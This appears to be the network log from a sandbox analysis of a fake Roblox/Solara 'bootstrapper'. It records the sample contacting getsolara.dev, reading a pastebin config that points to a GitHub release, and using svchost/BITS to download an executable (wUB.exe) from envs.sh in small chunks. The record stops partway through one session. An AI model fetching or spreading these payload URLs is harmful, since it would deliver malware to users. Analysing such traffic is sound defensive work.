Sep 16, 2024 12:22:28.014050961 CEST | 1.1.1.1 | 192.168.2.4 | 0xd4f7 | No error (0) | titanium.roblox.com | edge-term4.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 12:22:28.014050961 CEST | 1.1.1.1 | 192.168.2.4 | 0xd4f7 | No error (0) | edge-term4.roblox.com | edge-term4-lhr2.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 12:22:28.014050961 CEST | 1.1.1.1 | 192.168.2.4 | 0xd4f7 | No error (0) | edge-term4-lhr2.roblox.com | | 128.116.119.3 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 12:22:30.842379093 CEST | 1.1.1.1 | 192.168.2.4 | 0x26e1 | No error (0) | www.nodejs.org | | 104.20.23.46 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 12:22:30.842379093 CEST | 1.1.1.1 | 192.168.2.4 | 0x26e1 | No error (0) | www.nodejs.org | | 104.20.22.46 | A (IP address) | IN (0x0001) | false
                                            • getsolara.dev
                                            • pastebin.com
                                            • clientsettings.roblox.com
                                            • envs.sh
                                            • www.nodejs.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 104.21.93.27 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-16 10:22:24 UTC | 63 | OUT | GET / HTTP/1.1
                                            Host: getsolara.dev
                                            Connection: Keep-Alive
2024-09-16 10:22:24 UTC | 577 | IN | HTTP/1.1 200 OK
                                            Date: Mon, 16 Sep 2024 10:22:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            X-Frame-Options: SAMEORIGIN
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VT2Wdavp2rM9pZ8vNZfntRVSSywd5WuJjSMMbZ24SczMo4kclIHzKa%2BphjqwuBGVmNEKnLD0S%2FzeU4VKTcAOA4ZZpsY3IrFIl104woYh8KIDexoiYrm5HD7deAJVzZBX"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Strict-Transport-Security: max-age=0
                                            Server: cloudflare
                                            CF-RAY: 8c402298dde015d7-EWR
2024-09-16 10:22:24 UTC | 792 | IN | Data Ascii: 112a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 10:22:24 UTC | 1369 | IN | Data Ascii: ss' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = doc
2024-09-16 10:22:24 UTC | 1369 | IN | Data Ascii: enctype="text/plain"> <input type="hidden" name="atok" value="P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/"> <a href="https://www.cloudflare.com/learning/access-management/phishing-att
2024-09-16 10:22:24 UTC | 872 | IN | Data Ascii: ="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target
2024-09-16 10:22:24 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 104.21.93.27 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-16 10:22:24 UTC | 151 | OUT | GET /asset/discord.json HTTP/1.1
                                            Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/
                                            Host: getsolara.dev
2024-09-16 10:22:25 UTC | 831 | IN | HTTP/1.1 200 OK
                                            Date: Mon, 16 Sep 2024 10:22:24 GMT
                                            Content-Type: application/json
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Access-Control-Allow-Origin: *
                                            Cache-Control: public, max-age=0, must-revalidate
                                            ETag: W/"e1d895c526c3cd0cc3c6c0e3e7022f52"
                                            referrer-policy: strict-origin-when-cross-origin
                                            x-content-type-options: nosniff
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNp%2B0TQ4sON8EZR5Mf0mTkOve0phrEaQldvlS1HYFUVPmxdCszlSju32PSK5MJUNeFG0GRkQ7z9%2BDaFgoIH4Q0GAwIjTnq3TbzYsDR4gRKdSpHqPFaxKJpdqo6%2FGryzA"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Vary: Accept-Encoding
                                            CF-Cache-Status: DYNAMIC
                                            Strict-Transport-Security: max-age=0
                                            Server: cloudflare
                                            CF-RAY: 8c40229ddfb04332-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-09-16 10:22:25 UTC | 109 | IN | Data Ascii: 67{ "args" : { "code" : "xRCaC7cdBn" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
                                            2024-09-16 10:22:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            2 | 192.168.2.4 | 49737 | 104.20.4.235 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:27 UTC | 168 | OUT | GET /raw/pjseRvyK HTTP/1.1
                                            Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            2024-09-16 10:22:27 UTC | 398 | IN | HTTP/1.1 200 OK
                                            Date: Mon, 16 Sep 2024 10:22:27 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            x-frame-options: DENY
                                            x-content-type-options: nosniff
                                            x-xss-protection: 1;mode=block
                                            cache-control: public, max-age=1801
                                            CF-Cache-Status: HIT
                                            Age: 1695
                                            Last-Modified: Mon, 16 Sep 2024 09:54:12 GMT
                                            Server: cloudflare
                                            CF-RAY: 8c4022aefe0078e1-EWR
                                            2024-09-16 10:22:27 UTC | 562 | IN | Data Ascii: 22b{ "BootstrapperVersion": "1.19", "SupportedClient": "version-43ad1853ad91427d", "SoftwareVersion": "3.113", "BootstrapperUrl": "https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe", "SoftwareUrl":"https://g
                                            2024-09-16 10:22:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            3 | 192.168.2.4 | 49739 | 128.116.119.3 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:28 UTC | 213 | OUT | GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1
                                            Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/
                                            Host: clientsettings.roblox.com
                                            Connection: Keep-Alive
                                            2024-09-16 10:22:29 UTC | 576 | IN | HTTP/1.1 200 OK
                                            content-length: 119
                                            content-type: application/json; charset=utf-8
                                            date: Mon, 16 Sep 2024 10:22:28 GMT
                                            server: Kestrel
                                            cache-control: no-cache
                                            strict-transport-security: max-age=3600
                                            x-frame-options: SAMEORIGIN
                                            roblox-machine-id: c0893d27-7be0-f1d5-aa53-d7db1f83ae0e
                                            x-roblox-region: us-central_rbx
                                            x-roblox-edge: lhr2
                                            report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]}
                                            nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1}
                                            connection: close
                                            2024-09-16 10:22:29 UTC | 119 | IN | Data Ascii: {"version":"0.642.0.6420636","clientVersionUpload":"version-43ad1853ad91427d","bootstrapperVersion":"1, 6, 0, 6420636"}


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            4 | 192.168.2.4 | 49738 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:28 UTC | 137 | OUT | HEAD /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:28 UTC | 395 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:28 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 80384
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Accept-Ranges: bytes


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            5 | 192.168.2.4 | 49740 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:30 UTC | 209 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=0-1119
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:30 UTC | 420 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:30 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 1120
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 0-1119/80384
                                            2024-09-16 10:22:30 UTC | 1120 | IN | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf0O `@ @


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            6 | 192.168.2.4 | 49741 | 104.20.23.46 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:31 UTC | 193 | OUT | GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1
                                            Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/
                                            Host: www.nodejs.org
                                            Connection: Keep-Alive
                                            2024-09-16 10:22:31 UTC | 497 | IN | HTTP/1.1 307 Temporary Redirect
                                            Date: Mon, 16 Sep 2024 10:22:31 GMT
                                            Content-Type: text/plain
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Cache-Control: public, max-age=0, must-revalidate
                                            location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-vercel-id: iad1::vtdxh-1726482151642-24b5217e14b8
                                            CF-Cache-Status: DYNAMIC
                                            X-Content-Type-Options: nosniff
                                            Server: cloudflare
                                            CF-RAY: 8c4022c63d204370-EWR
                                            2024-09-16 10:22:31 UTC | 20 | IN | Data Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a
                                            Data Ascii: fRedirecting...
                                            2024-09-16 10:22:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            7 | 192.168.2.4 | 49744 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:35 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=1120-1323
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:35 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:35 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 204
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 1120-1323/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            8 | 192.168.2.4 | 49747 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:36 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=1324-1593
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:36 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:36 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 270
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 1324-1593/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            9 | 192.168.2.4 | 49751 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:39 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=1594-2051
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:39 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:39 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 458
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 1594-2051/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            10 | 192.168.2.4 | 49753 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:41 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=2052-2183
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:41 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:41 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 132
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 2052-2183/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            11 | 192.168.2.4 | 49756 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:44 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=2184-2710
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:44 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:44 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 527
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 2184-2710/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            12 | 192.168.2.4 | 49759 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:47 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=2711-2883
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:48 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:47 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 173
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 2711-2883/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            13 | 192.168.2.4 | 49760 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:50 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=2884-3472
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:50 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:50 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 589
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 2884-3472/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            14 | 192.168.2.4 | 49761 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:53 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=3473-3901
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:53 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:53 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 429
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 3473-3901/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            15 | 192.168.2.4 | 49762 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:55 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=3902-4187
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:55 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:55 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 286
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 3902-4187/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            16 | 192.168.2.4 | 49763 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:57 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=4188-4386
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:57 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:57 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 199
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 4188-4386/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            17 | 192.168.2.4 | 49764 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:22:59 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=4387-4410
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:59 UTC | 421 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:59 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 24
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 4387-4410/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            18 | 192.168.2.4 | 49765 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:03 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=4411-4758
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:03 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:03 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 348
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 4411-4758/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            19 | 192.168.2.4 | 49766 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:07 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=4759-5147
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:07 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:07 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 389
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 4759-5147/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            20 | 192.168.2.4 | 49767 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:11 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=5148-5320
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:11 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:11 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 173
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 5148-5320/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            21 | 192.168.2.4 | 49768 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-09-16 10:23:14 UTC | 212 | OUT | GET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=5321-5474
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:14 UTC | 422 | IN | HTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:14 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 154
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 5321-5474/80384


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            22 | 192.168.2.4 | 49770 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe
